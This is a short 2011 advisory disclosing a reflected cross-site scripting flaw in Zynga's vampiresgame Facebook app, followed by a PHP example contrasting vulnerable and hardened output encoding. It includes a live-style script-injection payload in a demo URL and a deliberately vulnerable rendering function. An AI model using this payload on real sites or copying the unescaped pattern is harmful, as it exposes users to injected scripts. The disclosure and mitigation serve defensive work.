
Zynga Vampiresgame Cross Site Scripting

Posted on 30 August 2011

----------------------------------------------------------------------
TITLE: Reflected XSS bug in ZYNGA vampiresgame(facebook apps)
vendor: www.apps.facebook.com/petvillegame/**[] <http://www.apps.facebook.com/petvillegame/**%5B%5D>
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2010 Zynga Game Network Inc
----------------------------------------------------------------------
DEMO: http://apps.facebook.com/vampiresgame/index.php?ref="><script>alert("r007k17-w")</script>
SUG: HTML encoding, escaping special characters, Input sanitization.
----------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts, 3psilonlambda and all my friends
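
The SUG line above, worked through as an added example (not code from the advisory or from Zynga). It assumes a hypothetical PHP handler that reflects the ref parameter into an href attribute, and assumes legitimate ref values are short alphanumeric tokens; the function names are made up for illustration.

```php
<?php
declare(strict_types=1);

// Vulnerable pattern (assumed): ref is concatenated into an attribute
// value unencoded, so a double quote in the input ends the attribute.
function render_link_vulnerable(string $ref): string
{
    return '<a href="index.php?ref=' . $ref . '">Play</a>';
}

// Input sanitization: accept only the expected token shape.
// $_GET['ref'] can be an array (ref[]=x), so reject non-strings too.
function normalize_ref(mixed $ref): string
{
    if (!is_string($ref) || preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $ref) !== 1) {
        return ''; // drop anything outside the allow-list
    }
    return $ref;
}

// HTML encoding: for values that must be echoed as text or inside a
// quoted attribute. ENT_QUOTES covers both " and '.
function encode_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened: validate, URL-encode the query value, then HTML-encode
// the finished URL for the attribute context it is written into.
function render_link_hardened(mixed $ref): string
{
    $url = 'index.php?ref=' . rawurlencode(normalize_ref($ref));
    return '<a href="' . encode_html($url) . '">Play</a>';
}

// The ref value from the DEMO line of the advisory.
$demo = '"><script>alert("r007k17-w")</script>';

echo "vulnerable: ", render_link_vulnerable($demo), "\n";
echo "hardened:   ", render_link_hardened($demo), "\n";
echo "encoded:    ", encode_html($demo), "\n";
echo "valid ref:  ", render_link_hardened('bookmark_01'), "\n";
```

The encoder has to match the output context: htmlspecialchars is correct for HTML text and quoted attributes, but not for values written into inline script or unquoted attributes.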

 
